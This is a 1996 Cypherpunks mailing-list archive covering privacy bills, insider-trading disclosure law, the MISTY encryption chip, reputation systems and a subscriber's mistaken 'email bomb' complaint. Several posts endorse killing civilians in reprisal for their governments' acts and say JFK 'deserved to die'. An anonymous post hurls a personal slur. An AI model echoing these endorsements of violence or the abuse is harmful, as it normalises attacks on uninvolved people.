><phnecards@aol.com>; Wed, 25 Sep 1996 11:04:18 -0400
>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
>	id AA26654; Wed, 25 Sep 1996 09:04:05 -0600
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id AAA10103
for
>cypherpunks-outgoing; Wed, 25 Sep 1996 00:55:24 -0700 (PDT)
>Received: from mail.pacifier.com (root@mail.pacifier.com [199.2.117.164]) by
>toad.com (8.7.5/8.7.3) with ESMTP id AAA10098 for <cypherpunks@toad.com>;
>Wed, 25 Sep 1996 00:55:16 -0700 (PDT)
>Received: from ip20.van1.pacifier.com (ip20.van1.pacifier.com
[206.163.4.20])
>by mail.pacifier.com (8.7.6-pac/8.7.3) with SMTP id AAA14065; Wed, 25 Sep
>1996 00:55:14 -0700 (PDT)
>Message-Id: <199609250755.AAA14065@mail.pacifier.com>
>X-Sender: jimbell@mail.pacifier.com
>X-Mailer: Windows Eudora Light Version 1.5.2
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Date: Wed, 25 Sep 1996 00:55:21 -0800
>To: Brian Davis <bdavis@thepoint.net>
>From: jim bell <jimbell@pacifier.com>
>Subject: Re: Hallam-Baker demands more repudiations or he'll write!
>Cc: cypherpunks@toad.com, jf_avon@citenet.net
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PhneCards@aol.com
Date: Thu, 26 Sep 1996 13:33:47 +0800
To: cypherpunks@toad.com
Subject: Re: Lexis and Privacy - Bill approaches.
Message-ID: <960925181309_529562745@emout02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Did you know this company is using your email address as part of
an unlawful email bomb?

I would advise you to write to them at cypherpunks@toad.com
and owner-cypherpunks@toad.com and advise them to stop
using your email address for this type of activity.

It is illegal to use a invalid return email address.  If this continues, I
will
be forced to prosecute the return email address - which they are
making to look like you.

Below is the letter that I received in my email box
=================================================

In a message dated 96-09-25 15:12:13 EDT, you write:

>Subj:	Re: Lexis and Privacy - Bill approaches.
>Date:	96-09-25 15:12:13 EDT
>From:	declan@eff.org (Declan McCullagh)
>Sender:	owner-cypherpunks@toad.com
>To:	unicorn@schloss.li (Black Unicorn)
>CC:	cypherpunks@toad.com
>
>This would be good if the bills were written well and thoughtfully. 
>Unfortunately, they explicitly extend executive branch regulatory
>jurisdiction to the Net. At least the one I read did; I understand there
>are multiple versions. 
>
>-Declan
>
>
>On Tue, 24 Sep 1996, Black Unicorn wrote:
>
>> 
>> Pressure from the FTC Which fielded hundreds of complaints about Lexis and
>> the social security number scrap) has prompted members of the Banking
>> Committee to add provisions to the most recent spending bills which
>> protect personal information (including social security numbers, phone
>> numbers, addresses, and so forth) under the Fair Credit Reporting Act.
>> This limits access to this information to credit agencies and otherwise
>> authorized entities.  (Of which I assume Lexis is not one).
>> 
>> It's not great protection, but it's something.
>> 
>> I urge everyone to take their own measures to protect personal data
>> regardless of what some piece of paper on a library shelf says is
>> protected.  The only real protection is not to allow release of the data
>> in the first place.
>> 
>> --
>> I hate lightning - finger for public key - Vote Monarchist
>> unicorn@schloss.li
>> 
>
>
>// declan@eff.org // I do not represent the EFF // declan@well.com //
>
>
>
>
>----------------------- Headers --------------------------------
>From cypherpunks-errors@toad.com  Wed Sep 25 15:11:39 1996
>Return-Path: cypherpunks-errors@toad.com
>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for
><phnecards@aol.com>; Wed, 25 Sep 1996 15:11:34 -0400
>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
>	id AA27335; Wed, 25 Sep 1996 13:11:11 -0600
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA15636
for
>cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT)
>Received: from eff.org (declan@eff.org [204.253.162.3]) by toad.com
>(8.7.5/8.7.3) with ESMTP id FAA15631 for <cypherpunks@toad.com>; Wed, 25 Sep
>1996 05:06:39 -0700 (PDT)
>Received: (from declan@localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed,
>25 Sep 1996 05:06:38 -0700 (PDT)
>Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT)
>From: Declan McCullagh <declan@eff.org>
>To: Black Unicorn <unicorn@schloss.li>
>Cc: cypherpunks@toad.com
>Subject: Re: Lexis and Privacy - Bill approaches.
>In-Reply-To: <Pine.SUN.3.94.960924190706.9902A-100000@polaris>
>Message-Id: <Pine.SUN.3.91.960925050416.10072A-100000@eff.org>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 26 Sep 1996 04:02:16 +0800
To: cypherpunks@toad.com
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609242023.NAA10037@dns1.noc.best.net>
Message-ID: <Pine.HPP.3.91.960925180702.2695A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, James A. Donald wrote:

> Let us just run through the sequence of events.
> 
> A bunch of leftover commies publish some boring commie crap in Germany,
> which probably most people would have ignored.

But are these people really 'leftover commies'? Trying to
read #154 is rather confusing (but my German is not that
great, which could explain this). The 'Autonomen' don't
seem to be 'leftover' in the real sense, you get the impression
they are young people. Obviously they are opposed to the 'Punks'
whatever that means. I wish someone from Germany could deliver
a short resume of their political views - the interesting
question being why the German authorities obviously fear them.
(One German on the list has opinioned that they are 'childish'
but that doesn't say much.)

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 10:19:17 +0800
To: cypherpunks@toad.com
Subject: Re: AP
In-Reply-To: <9609251845.aa16492@salmon.maths.tcd.ie>
Message-ID: <D81TuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Bell <dbell@maths.tcd.ie> writes:

> In message <si4RuD1w165w@bwalk.dm.com>, "Dr.Dimitri Vulis KOTM" writes:
> >Yes, I do.
> 
> 	I'm not sure what you mean here. Is it:
> 1. You hold people respobsible for what they did, not what their government
> did. (Assuming said people didn't take part in what the government did.)
> 
> 2. You agree that the IRA could justify killing any British citizen, even if
> said citizen supported the IRA or agreed with its aims.
> 
> 3. Something else. (Please specify.)

(Redirected to the list.)
Any British citizen, irrespective of s/he thinks about the IRA, has
benefited economically from the 800 years of pillaging and genocide
in Ireland.  I see no problem if they pay with their lives for
these crimes. Likewise I see no problem if U.S. civilians pay with
their lives for their government's crimes in Iraq, even if they
happen to disapprove of these crimes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 26 Sep 1996 03:50:21 +0800
To: cypherpunks@toad.com
Subject: Re: Medical Data
In-Reply-To: <ae6d921400021004c1d5@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.960925181655.2695B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Timothy C. May wrote:

> Why can't patients carry their _own_ medical records, and disclose what
> they wish to disclose to doctors and hospitals, as they see fit? Whether
> implemented in a high-tech version, as a "smart card," or a low-tech
> version, as a "dossier" (a file folder), the principle's the same.

One problem is when a patient is suing his doctor, but claiming that his
'dossier' was lost in a fire. The doctor then has to defend himself
with only 'your word against mine' instead of having his own account
of what was happening on file, including test results etc that could
be very interesting for the defence.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 26 Sep 1996 09:04:17 +0800
To: bryce@digicash.com
Subject: Re: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) )
In-Reply-To: <199609251219.OAA28483@digicash.com>
Message-ID: <Pine.SUN.3.94.960925182315.23216A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996 bryce@digicash.com wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> It's silly to conflate ratings of people with ratings of
> people's opinions with ratings of people's ratings of etc.
> 
> 
> Some of the people I work with have awful opinions on politics,
> other people, music, movies, books, and food, but great opinions
> on computer hardware, algorithms and programming languages.
> 
> 
> But their ratings as people are generally very high.
> 
> 
> (Insert inaccurate but amusing joke to the effect that if 
> someone has good taste in restaurants they are likely to have 
> poor taste in video cards, or some such.)
> 
> 
> Check out Firefly (www.ffly.com).  (Cpunk comment:  they only
> track your ratings by nym, no True Name required.)
> 
> 
> Firefly has the "if I agreed with Bob a lot in the past on this
> subject, I'll probably agree with him again" heuristic.  It
> appears to be a pretty ugly heuristic when applied to me.  Ffly
> keeps trying to suggest music which is in the same _genre_ as 
> music I have previously recommended, but what I am interested is
> music that is similarly _good_.  My tastes don't correspond well
> to genres.
> 

This is incorrect.

Firefly actually looks at what you have recommended and then finds others
who have recommended or favor the same songs/albums/groups and selects new
groups albums or songs based on the number of people who agree with your
recommendations who suggest them.

i.e. if you give the eagles a 5 out of 5, and 20 others also gave the
eagles high ratings, the system weeds out what other groups those 20 gave
high ratings to and suggests them to you.  As you confirm or deny your
interest in those groups, the system narrows it down even more, using
those choices to find others who seem to have similar tastes to you and
suggesting albums and groups not yet in your file which have been
recommended by those with tastes like yours.

This trancends genres.  It's quite a nice system.

It also makes an important point about reputations.  Using a catagory
reputation scale is, as the author above describes, not very efficient.

> 
> But this is a mere anecdotal impression.  Give it a spin.  
> 
> 
> I wrote in the suggestion box that they add meta-ratings
> (especially ratings on the little "movie reviews" submitted by
> other FFly users).  Some guy wrote back (same day!) that they
> were planning on it.
> 
> 
> Regards,
> 
> Bryce
> 
> 

> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2i
> Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2
> 
> iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM
> XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb
> fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C
> =rL1w
> -----END PGP SIGNATURE-----
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 26 Sep 1996 12:30:55 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609260141.SAA15334@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:24 AM 9/24/96 -0700, Dale Thorn wrote:
>Lessee if I have this right, now.  We have basically three scenarios:
>
>1. Allow the status quo to continue (the justice system scam now run by
>   Janet Reno/Louis Freeh types et al.
>2. Allow the people some democracy in applying justice through AP.
>3. Sometime in the future, build the Gort(?) robots, as in The Day The
>   Earth Stood Still, and let them do the job.
>
>Whatcha think?

That's about it.  I long ago noticed the similarity between AP and the 
fictional Gort.  

Problem is, Gort would have to be programmed. How would you write such a 
program?  Governments would want their hand in it.  They'd insist on 
"government exceptions" to rules, like:   "All violence is forbiddden!  
(except for violence by duly authorized government employees!)"

Not very practical.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 26 Sep 1996 12:40:32 +0800
To: PhneCards@aol.com
Subject: Re: Lexis and Privacy - Bill approaches.
In-Reply-To: <960925181309_529562745@emout02.mail.aol.com>
Message-ID: <Pine.GSO.3.95.960925185705.17207A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear PhneCards,

Please stop using my email address as part of an inappropriate email
bomb. If this continues, I will be forced to persecute your return
email address.

Now we don't want that to happen, do we?

-Declan


On Wed, 25 Sep 1996 PhneCards@aol.com wrote:

> Date: Wed, 25 Sep 1996 18:13:24 -0400
> From: PhneCards@aol.com
> To: declan@eff.org, cypherpunks@toad.com
> Subject: Re: Lexis and Privacy - Bill approaches.
> 
> Did you know this company is using your email address as part of
> an unlawful email bomb?
> 
> I would advise you to write to them at cypherpunks@toad.com
> and owner-cypherpunks@toad.com and advise them to stop
> using your email address for this type of activity.
> 
> It is illegal to use a invalid return email address.  If this continues, I
> will
> be forced to prosecute the return email address - which they are
> making to look like you.
> 
> Below is the letter that I received in my email box
> =================================================
> 
> In a message dated 96-09-25 15:12:13 EDT, you write:
> 
> >Subj:	Re: Lexis and Privacy - Bill approaches.
> >Date:	96-09-25 15:12:13 EDT
> >From:	declan@eff.org (Declan McCullagh)
> >Sender:	owner-cypherpunks@toad.com
> >To:	unicorn@schloss.li (Black Unicorn)
> >CC:	cypherpunks@toad.com
> >
> >This would be good if the bills were written well and thoughtfully. 
> >Unfortunately, they explicitly extend executive branch regulatory
> >jurisdiction to the Net. At least the one I read did; I understand there
> >are multiple versions. 
> >
> >-Declan
> >
> >
> >On Tue, 24 Sep 1996, Black Unicorn wrote:
> >
> >> 
> >> Pressure from the FTC Which fielded hundreds of complaints about Lexis and
> >> the social security number scrap) has prompted members of the Banking
> >> Committee to add provisions to the most recent spending bills which
> >> protect personal information (including social security numbers, phone
> >> numbers, addresses, and so forth) under the Fair Credit Reporting Act.
> >> This limits access to this information to credit agencies and otherwise
> >> authorized entities.  (Of which I assume Lexis is not one).
> >> 
> >> It's not great protection, but it's something.
> >> 
> >> I urge everyone to take their own measures to protect personal data
> >> regardless of what some piece of paper on a library shelf says is
> >> protected.  The only real protection is not to allow release of the data
> >> in the first place.
> >> 
> >> --
> >> I hate lightning - finger for public key - Vote Monarchist
> >> unicorn@schloss.li
> >> 
> >
> >
> >// declan@eff.org // I do not represent the EFF // declan@well.com //
> >
> >
> >
> >
> >----------------------- Headers --------------------------------
> >From cypherpunks-errors@toad.com  Wed Sep 25 15:11:39 1996
> >Return-Path: cypherpunks-errors@toad.com
> >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
> >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for
> ><phnecards@aol.com>; Wed, 25 Sep 1996 15:11:34 -0400
> >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
> >	id AA27335; Wed, 25 Sep 1996 13:11:11 -0600
> >Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA15636
> for
> >cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT)
> >Received: from eff.org (declan@eff.org [204.253.162.3]) by toad.com
> >(8.7.5/8.7.3) with ESMTP id FAA15631 for <cypherpunks@toad.com>; Wed, 25 Sep
> >1996 05:06:39 -0700 (PDT)
> >Received: (from declan@localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed,
> >25 Sep 1996 05:06:38 -0700 (PDT)
> >Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT)
> >From: Declan McCullagh <declan@eff.org>
> >To: Black Unicorn <unicorn@schloss.li>
> >Cc: cypherpunks@toad.com
> >Subject: Re: Lexis and Privacy - Bill approaches.
> >In-Reply-To: <Pine.SUN.3.94.960924190706.9902A-100000@polaris>
> >Message-Id: <Pine.SUN.3.91.960925050416.10072A-100000@eff.org>
> >Mime-Version: 1.0
> >Content-Type: TEXT/PLAIN; charset=US-ASCII
> >Sender: owner-cypherpunks@toad.com
> >Precedence: bulk
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Squirrel Remailer <mix@squirrel.owl.de>
Date: Thu, 26 Sep 1996 06:58:34 +0800
To: cypherpunks@toad.com
Subject: A periodic word of caution regarding Timothy C[unt] May
Message-ID: <19960925190103.5469.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C[unt] May proves that the Midwestern gene pool needs some chlorine 
in it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: themom <themom@nando.net>
Date: Thu, 26 Sep 1996 10:28:12 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Public Schools
In-Reply-To: <Pine.OSF.3.91.960924222425.29544A-100000@alpha.tenet.edu>
Message-ID: <Pine.SUN.3.91.960925191310.9701B-100000@bessel.nando.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Sep 1996, Dan Harmon wrote:

> 
> 
> On Tue, 24 Sep 1996, William H. Geiger III wrote:
> 
> >    Dan Harmon <harmon@tenet.edu> said:
> 
> > >One of the hardest things that we have to work hardest to counter-act 
> > >with our twins, who attend PS, is the socialization they 
> > >pick up at school.
> > 
> > There is an easy solution to that problem, it's called home school. :)
> > 
> 
    Really there is no 'Correct' solution some students function better
    in Public Schools, some in private and others in home.  I know of success
    stories and failures in each.  I had a couple of friends who were in 
home school during their Freshman and Sophomore year in highschool but 
then decided to go back to public school, they were so far behind it 
wasn't funny...any ways, one droped out and then other is just now 
getting back in the "groove" of things (he is a junior).  I guess the 
choice of schools is up to the individual, personally I am a student of a 
Public school, Enloe High, and truely hate it, I would perfer being in a 
private school but, I do not have that kind of money to spend, sure I 
could go to a cheep private school and not have the advantages of the 
people in public schools which (strangely) have more money.  I could also 
do home school but my parents would drive me insane .   But I totally 
disagree with the posts saying public school students become drug 
dealers, NONE, of my friends do drugs, drink, smoke, etc...   Most 
students turn out to be functional members of society, with a few odd 
balls ruining the reputation of the public school system...

Thats just my two cents.....
  Brent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 10:57:58 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Public Schools
In-Reply-To: <oLiTuD1w165w@bwalk.dm.com>
Message-ID: <Pine.SOL.3.93.960925192327.18942A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Phil Fraering <pgf@acadian.net> writes:
> > Without vouchers, you don't say anything about the intelligence of your
> > test subjects; to a _very_ large degree, intelligence isn't genetic. Or
> 
> That's the political correct thing to say, but do you have any scientific
> evidence to support this claim?

All the smart people I know with stupid kids?

> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Thu, 26 Sep 1996 10:18:34 +0800
To: CP <cypherpunks@toad.com>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com>
Message-ID: <9609251925.aa18524@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <3.0b24.32.19960924064658.006b3540@mail.teleport.com>, Rich Burrough
s writes:
>At 08:33 PM 9/23/96 -0700, tcmay@got.net (Timothy C. May) wrote in response to PH-B:
>>I for one don't respond well to extortion threats, so write your damned
>>article.

	I agree; PH-B is commiting a bunch of fallacies here and tarring
all cypherpunks with the same brush as Jim Bell just because they haven't
repudiated Assasination Politics is just being obnoxious.

>I personally don't have the time or energy to contribute to the AP threads.
>That != approval for the idea.

	Ditto; I could spend time analysing AP, but life's too short to waste
it on refuting everything I disagree with in detail.

	Derek "who is _not_ Jim" Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 26 Sep 1996 10:14:31 +0800
To: Phil Fraering <pgf@acadian.net>
Subject: Re: Possible snake oil?
In-Reply-To: <Pine.SOL.3.93.960925154728.17155A-100000@stiletto.acadian.net>
Message-ID: <Pine.SUN.3.91.960925193110.2231A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


1024 bit  keylengths are commonly used with RSA, and are generally 
considered to be secure. Remember, key lengths can't easily be compared 
between algorithms from radically different familys 

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 26 Sep 1996 15:13:23 +0800
To: cypherpunks@toad.com
Subject: Re: Insider Trading - What constitutes "Disclosure" ?
Message-ID: <v02130501ae6f3f513585@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Often the choice faced by the investor who has material non-public
>information is characterized as "disclose or abstain," meaning that the
>investor may either trade after disclosing or abstain from trading on the
>information.
>
>A few people have asked me what constitutes disclosure.
>
>I've not researched the latest cases, but the generally accepted "best
>description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833
>(2d Cir.1968), cert. denied.
>
> The reading of a news release, which promoted Coates into
>action, is merely the first step in the process of dissemination required
>for compliance with the regulatory objective of providing all investors
>with an equal opportuinity to make informed investment judgements.
>Assuming that the contents of the official release could have been
>instantaneously be acted upon, at the minimum Coates should have waited
>until the news could reasonably have been expcted to appear over the media
>of widest circulation, the Dow Jones broad tape, rather than hastening to
>insure an advantage to himself and his broker son-in-law.
>

It would seem to me that if I operated an open listserver, upon which
financial information regularly appeared and which any trader (serious or
otherwise) might subscribe, my information should be held in the same legal
regard as DJ. If not, the SEC has in effect created a monopoly for
Dow-Jones and its ilk and effectively impede or excluded other news sources
(e.g., Internet feeds) as legit means for generating market awareness, and
therefore revenue.  I and many others occassionally trade on public
information from narrower sources than DJ (e.g., market newsletters).
Sometimes DJ and others pick up info from these sources and sometimes they
don't (or not immediately).  Does that mean those trading on this data
published not yet picked up by DJ may be trading illegally?  If so, this is
totally unjust and wrongheaded.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 26 Sep 1996 07:46:02 +0800
To: cypherpunks@toad.com
Subject: Mitsubishi MISTY LSI
Message-ID: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Nikkei English News, 24 September 1996. 
 
 
   Mitsubishi unveils Japan's fastest encryption chip  
 
 
   Mitsubishi Electric Corp. said it has developed an LSI 
   that can encrypt data at a speed of 450 megabits per 
   second, which is four times faster than any other 
   encryption chip developed in Japan and brings domestic 
   technology in line with DES, the U.S.-developed 
   encryption system that has become the standard in the 
   U.S. and Europe. 
 
   Because the chip performs the same as DES, Mitsubishi 
   will promote it as a domestic product for encryption 
   needs in Japan, with an eye on the growing market for 
   corporate intranets and high-speed data communications. 
   It said it will prepare for volume production during this 
   year. 
 
   The company fabricated the chip as a gate array using a 
   0.5 micron CMOS process and its own proprietary 
   encryption algorithm MISTY. Operating at a maximum 
   input/output speed of 40 megahertz, the chip can handle 
   32 bits per clock cycle. 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 26 Sep 1996 11:31:05 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <u0NTuD1w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.960925203856.1084A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Wed, 25 Sep 96 13:40:17 EDT
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com
> Subject: Re: Hallam-Baker demands more repudiations or he'll write!
> 
> Phil Fraering <pgf@acadian.net> writes:
> > It's widely believed that the New Orleans Mafia (the source of my recent
> > statement about body decomposition in Louisiana swamps) was a prime driver
> > in the assasination of the late President John F. Kennedy.
> > 
> > I think it's fairly safe to say that having done this didn't do them a
> > damn bit of good. It didn't do anyone else a damn bit of good.
> 
> JFK deserved to die.
> 

Wile i neither agree nor disagree with your point, it does seem a bit
irrelavant, but thats just MHO.

 --Deviant
If you look rather casual with the knife when you flick it open, people
don't like it.
                -- Gerry Youghkins






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 26 Sep 1996 11:44:52 +0800
To: cypherpunks@toad.com
Subject: Insider Trading - What constitutes "Disclosure" ?
Message-ID: <Pine.SUN.3.94.960925203523.2802A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



This is not legal advice.  You got it for free.

Often the choice faced by the investor who has material non-public
information is characterized as "disclose or abstain," meaning that the
investor may either trade after disclosing or abstain from trading on the
information.

A few people have asked me what constitutes disclosure.

I've not researched the latest cases, but the generally accepted "best
description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833
(2d Cir.1968), cert. denied.

As to the defense's claim that their purchases of stock were not
proscribed because the news had effectively been disclosed, the court
offered:  (errors mine)

Crawford (defendant) telephoned his orders to his Chicago broker about
midnight on April 15 and again at 8:30 in the morning of the 16th, with
instructions to buy at the opening of the Midwest Stock Exchange.  The
trial court's finding that "he sought to, and did, 'beat the news,' 258
F.Supp. at 287, is well documented by the record..  The rumors of a major
ore strike which had been circulated in Canada and , to a lesser extent,
in New York, had been disclaimed by the TGS press release of April 12,
which significantly promised the public an official detailed announcement
when possibilities had ripened into actualities.  The abbreviated
announcement to the Canadian press at 9:40 A.M. on the 16th by the Ontario
Minister of Mines and the report carried by the Northern Miner, parts of
which had sporadically reached New York on the morning of the 16th through
reports from Canadian affiliates to a few New York investment firms, are
assuredly not the equivalent of the official 10-15 minute announcement
which was not released to teh American financial press until after 10:00
AM.  Crawford's orders had been placed before that.  **Before insiders may
act upon material information, such information must have been effectively
disclosed in a manner sufficient to insure its availability to the
investing public.**  Particularly here, whre a formal announcement to the
entire financial news media had been promised in a prior official release
known to the media, all insider activity must await dissemination of the
promised official announcement.
Coates was absolved by the court below because his telephone order was
placed shortly before 10:20 AM on April 16, which was after the
announcement had been made public even though the news could not be
considered already a matter of public information.  258 F.Supp at 288.
This result seems to have been predicated upon a misinterpretation of
dicta in Cady, Roberts, where the SEC instructed insiders to "keep out of
the market until the estlablished procedures for public release of the
information are carried out instead of hastening to execute transactions
in advance of, and in frustration of, the objectives of the release," 40
S.E.C. at 915.  The reading of a news release, which promoted Coates into
action, is merely the first step in the process of dissemination required
for compliance with the regulatory objective of providing all investors
with an equal opportuinity to make informed investment judgements.
Assuming that the contents of the official release could have been
instantaneously be acted upon, at the minimum Coates should have waited
until the news could reasonably have been expcted to appear over the media
of widest circulation, the Dow Jones broad tape, rather than hastening to
insure an advantage to himself and his broker son-in-law.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 26 Sep 1996 13:54:50 +0800
To: cypherpunks@toad.com
Subject: Re: Mitsubishi MISTY LSI
Message-ID: <199609260351.UAA02953@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Nikkei English News, 24 September 1996. 
> 
>   [Mitsubishi] fabricated the chip as a gate array using a 
>   0.5 micron CMOS process and its own proprietary 
>   encryption algorithm MISTY. Operating at a maximum 
>   input/output speed of 40 megahertz, the chip can handle 
>   32 bits per clock cycle. 

Does anyone have a reason not to consider this algorithm snake oil?  e.g.:

Was it developed by a well known cryptographer?
Has it been vetted by someone/some organization with reputation?

I other words, why should we trust it?


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 26 Sep 1996 13:55:29 +0800
To: PhneCards@aol.com
Subject: Re: Private Information Retrieval
Message-ID: <199609260351.UAA02957@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:11 PM 9/25/96 -0400, PhneCards@aol.com wrote:
>Did you know this company is using your email address as part of
>an unlawful email bomb?

As part of helping you get a clue about how the net works, I offer you the
following information:

You have been subscribed to a long-standing Internet mailing list.  Mailing
lists are also called a mail exploders because any mail sent to them is
resent to all the subscribers.  You should have gotten instructions on
unsubscribing when you were subscribed.  If you have lost them, Tim May has
kindly given you and others in your situation some useful hints:

>Send the correct word to the correct address, stated often here, and you
>will be unsubscribed.
>
>--Tim May
>
>
>(Hint: majordomo@toad.com, with message body of "unsubscribe cypherpunks"
>(no quotes))
>

Note that this is not a mail bomb attack.  Each message is different and
there are only about 100 of them of a normal day.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






